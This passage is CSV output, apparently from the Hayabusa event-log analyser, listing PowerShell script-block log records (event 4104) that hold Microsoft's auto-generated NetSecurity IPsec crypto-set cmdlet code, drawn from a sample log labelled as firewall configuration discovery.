[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeCryptoSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} 